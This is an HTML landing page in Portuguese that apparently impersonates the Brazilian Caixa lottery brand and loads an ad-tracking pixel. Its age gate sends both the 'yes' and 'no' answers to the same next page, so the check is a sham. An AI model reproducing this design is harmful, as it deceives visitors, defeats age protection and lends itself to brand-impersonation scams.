<!DOCTYPE html><html lang="pt-br"><head>
    
    <script>
  window.pixelId = "688ca95f7f6a7d61dead5765";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>
    
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap" rel="stylesheet">
    


    <style>
    
   @font-face {
        font-family: 'Futura-Book';
        src: url('fonts/Futura-Book.eot');
        src: url('font/loteriacaixabrasil.com/font/Futura-Book.eot#iefix') format('embedded-opentype'),
            url('fonts/Futura-Book.woff2') format('woff2'),
            url('fonts/Futura-Book.woff') format('woff'),
            url('fonts/Futura-Book.ttf') format('truetype'),
            url('images/Futura-Book.svg#Futura-Book') format('svg');
        font-weight: normal;
        font-style: normal;
        font-display: swap;
    }

    body {
        font-family: 'Futura-Book' !important;
        background: linear-gradient(45deg, #00a9ad, #005ca9); 
        background-size: 100%;
        background-repeat: no-repeat;
        height: 100vh !important;
        overflow: hidden !important;
    }

    .container-principal {
        height: 100vh;
    }

    .container-principal img {
        width: 100px;
    }

    .container-principal h1 {
        color: white;
        font-size: 1.5rem;
        margin-top: 3rem;
    }

    .botoes {
        margin-top: .5rem;
    }

    .botoes a {
        width: 8rem;
        margin: 0rem .7rem;
    }

    .botoes button {
        background-color: #f39200;
        color: white;
        font-weight: 500;
        width: 100%;
        border: none;
        padding: .5rem .5rem .2rem .5rem;
        font-size: 1.2rem;
        border-radius: .4rem;
    }

    .botoes button:hover {
        background-color: #173e68;
        color: white;
    }

    button.btn-nao {
        background-color: white;
        color: #173e68;
    }

    
  </style></head>
  
  <body>

    <div class="container-principal d-flex justify-content-center align-items-center flex-column">
        <img src="images/loterias-caixa-logo.webp" alt="">
        <h1>Você tem mais de 18 anos?</h1>
        <div class="botoes w-100 d-flex justify-content-center align-items-center">
            <a href="#" onclick="redirecionarComParametros('/c/2/index.html')"><button>SIM</button></a>
            <a href="#" onclick="redirecionarComParametros('/c/2/index.html')"><button class="btn-nao">NÃO</button></a>
        </div>
    </div>


    <script src="js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
    
    <script>
        // Função para redirecionar preservando parâmetros UTM
        function redirecionarComParametros(url) {
            // Capturar parâmetros UTM atuais da URL
            const urlParams = new URLSearchParams(window.location.search);
            const currentParams = urlParams.toString();
            const finalUrl = currentParams ? `${url}?${currentParams}` : url;
            
            window.location.href = finalUrl;
        }
    </script>
  


</body></html>